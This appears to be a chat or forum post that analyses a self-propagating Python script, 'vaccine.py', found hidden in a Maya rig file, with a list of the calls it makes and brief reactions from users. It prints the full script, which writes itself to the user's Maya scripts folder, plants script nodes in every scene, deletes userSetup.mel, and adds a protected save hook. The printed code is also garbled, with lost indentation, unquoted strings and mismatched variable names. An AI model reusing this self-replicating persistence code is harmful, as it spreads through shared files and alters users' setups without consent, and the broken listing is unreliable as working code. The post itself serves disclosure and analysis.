This is a scene file from the CG Monastery Discord chat user @roly, containing an embedded script that auto-installs and calls itself on SceneSave. The script was found in the rig bat_rig_04.mb
, rather than the animation file, TURN_ani_bat_23.ma
. Find the imported scene file below (5340 kb).
What happens?
- Installs itself on scene-open, as a
cmds.scriptJob
- Installs itself on Maya open, as
~/maya/scripts/vaccine.py
- Warning on scene save with the following message
Suspicious words
- virus
- antivirus
- vaccine
Suspicious calls
Calls that don't belong in any rig or animation file.
os.makedirs
os.remove
os.path.exists
shutil.copyfile
cmds.internalVar
Full Script Job
Obfuscated and hidden inside of the binary .mb
file is this.
# coding=utf-8
# @Time : 2020/07/05 15:46
# @Author : \\xe9\\xa1\\xb6\\xe5\\xa4\\xa9\\xe7\\xab\\x8b\\xe5\\x9c\\xb0\\xe6\\x99\\xba\\xe6\\x85\\xa7\\xe5\\xa4\\xa7\\xe5\\xb0\\x86\\xe5\\x86\\x9b
# @File : vaccine.py
# \\xe4\\xbb\\x85\\xe4\\xbd\\x9c\\xe4\\xb8\\xba\\xe5\\x85\\xac\\xe5\\x8f\\xb8\\xe5\\x86\\x85\\xe9\\x83\\xa8\\xe4\\xbd\\xbf\\xe7\\x94\\xa8\\xe4\\xbf\\x9d\\xe6\\x8a\\xa4 \\xe4\\xb8\\x80\\xe6\\x97\\xa6\\xe6\\xb3\\x84\\xe9\\x9c\\xb2\\xe5\\x87\\xba\\xe5\\x8e\\xbb\\xe9\\x80\\xa0\\xe6\\x88\\x90\\xe7\\x9a\\x84\\xe5\\xbd\\xb1\\xe5\\x93\\x8d \\xe6\\x9c\\xac\\xe4\\xba\\xba\\xe6\\xa6\\x82\\xe4\\xb8\\x8d\\xe8\\xb4\\x9f\\xe8\\xb4\\xa3
import maya.cmds as cmds
import os
import shutil
class phage:
@staticmethod
def backup(path):
folder_path = path.rsplit('/', 1)[0]
file_name = path.rsplit('/', 1)[-1].rsplit('.', 1)[0]
backup_folder = folder_path + '/history'
new_file = backup_folder + '/' + file_name + '_backup.ma '
if not os.path.exists(backup_folder):
os.makedirs(backup_folder)
shutil.copyfile(path, new_file)
def antivirus(self):
health = True
self.clone_gene()
self.antivirus_virus_base()
virus_gene = ['sysytenasdasdfsadfsdaf_dsfsdfaasd', 'PuTianTongQing', 'daxunhuan']
all_script_jobs = cmds.scriptJob(listJobs=True)
for each_job in all_script_jobs:
for each_gene in virus_gene:
if each_gene in each_job:
health = False
job_num = int(each_job.split(':', 1)[0])
cmds.scriptJob(kill=job_num, force=True)
all_script = cmds.ls(type='script')
if all_script:
for each_script in all_script:
commecnt = cmds.getAttr(each_script + '.before')
for each_gene in virus_gene:
if commecnt:
if each_gene in commecnt:
try:
cmds.delete(each_script)
except:
name_space = each_script.rsplit(':',1)[0]
cmds.error(u'{}\\xe8\\xa2\\xab\\xe6\\x84\\x9f\\xe6\\x9f\\x93\\xe4\\xba\\x86\\xef\\xbc\\x8c\\xe4\\xbd\\x86\\xe6\\x98\\xaf\\xe6\\x88\\x91\\xe6\\xb2\\xa1\\xe6\\xb3\\x95\\xe5\\x88\\xa0\\xe9\\x99\\xa4'.format(name_space))
if not health:
file_path = cmds.file(query=True, sceneName=True)
self.backup(file_path)
cmds.file(save=True)
cmds.error(u'\\xe4\\xbd\\xa0\\xe7\\x9a\\x84\\xe6\\x96\\x87\\xe4\\xbb\\xb6\\xe8\\xa2\\xab\\xe6\\x84\\x9f\\xe6\\x9f\\x93\\xe4\\xba\\x86\\xef\\xbc\\x8c\\xe4\\xbd\\x86\\xe6\\x98\\xaf\\xe6\\x88\\x91\\xe8\\xb4\\xb4\\xe5\\xbf\\x83\\xe7\\x9a\\x84\\xe4\\xb8\\xba\\xe6\\x82\\xa8\\xe6\\x9d\\x80\\xe6\\xaf\\x92\\xe5\\xb9\\xb6\\xe4\\xb8\\x94\\xe5\\xa4\\x87\\xe4\\xbb\\xbd\\xe4\\xba\\x86~\\xe4\\xb8\\x8d\\xe7\\x94\\xa8\\xe8\\xb0\\xa2~')
else:
cmds.warning(u'\\xe4\\xbd\\xa0\\xe7\\x9a\\x84\\xe6\\x96\\x87\\xe4\\xbb\\xb6\\xe8\\xb4\\xbc\\xe5\\x81\\xa5\\xe5\\xba\\xb7~\\xe6\\x88\\x91\\xe5\\xb0\\xb1\\xe8\\xaf\\xb4\\xe4\\xb8\\x80\\xe5\\xa3\\xb0\\xe6\\xb2\\xa1\\xe6\\x9c\\x89\\xe5\\x88\\xab\\xe7\\x9a\\x84\\xe6\\x84\\x8f\\xe6\\x80\\x9d')
@staticmethod
def antivirus_virus_base():
virus_base = cmds.internalVar(userAppDir=True) + '/scripts/userSetup.mel'
if os.path.exists(virus_base):
try:
os.remove(virus_base)
except:
cmds.error(u'\\xe6\\x9d\\x80\\xe6\\xaf\\x92\\xe5\\xa4\\xb1\\xe8\\xb4\\xa5')
def clone_gene(self):
vaccine_path = cmds.internalVar(userAppDir=True) + '/scripts/vaccine.py'
if not cmds.objExists('vaccine_gene'):
if os.path.exists(vaccine_path):
gene = list()
with open(vaccine_path, "r") as f:
for line in f.readlines():
gene.append(line)
npetri_dish_gene = """
import sys
import maya.cmds as cmds
maya_path = cmds.internalVar(userAppDir=True) + /scripts
if maya_path not in sys.path:
sys.path.append(maya_path)
import vaccine
cmds.evalDeferred(leukocyte = vaccine.phage())
cmds.evalDeferred(leukocyte.occupation())
with open(petri_dish_path, "w") as f:
f.writelines(petri_dish_gene)
"""
cmds.scriptNode(st=1,
n='vaccine_gene', stp='python',
bs=bs)
cmds.addAttr('vaccine_gene', ln="notes", sn="nts", dt="string")
cmds.setAttr('vaccine_gene.notes', gene, type='string')
if not cmds.objExists('breed_gene'):
cmds.scriptNode(st=1,
n='breed_gene',
stp='python',
bs="""\
import os
vaccine_path = cmds.internalVar(userAppDir=True) + /scripts/vaccine.py
if not os.path.exists(vaccine_path):
if cmds.objExists(vaccine_gene):
gene = eval(cmds.getAttr(vaccine_gene.notes))
with open(vaccine_path, "w") as f:
f.writelines(gene)
""")
def occupation(self):
cmds.scriptJob(event=["SceneSaved", "leukocyte.antivirus()"], protected=True)
just came across this randomly, here's a few strings in that file translated into English.
Vaguely looks like self-propagating guerilla antivirus. Designed to remove certain malware from Maya installs, hilarious.
^ Hilarious. There must be a story behind this.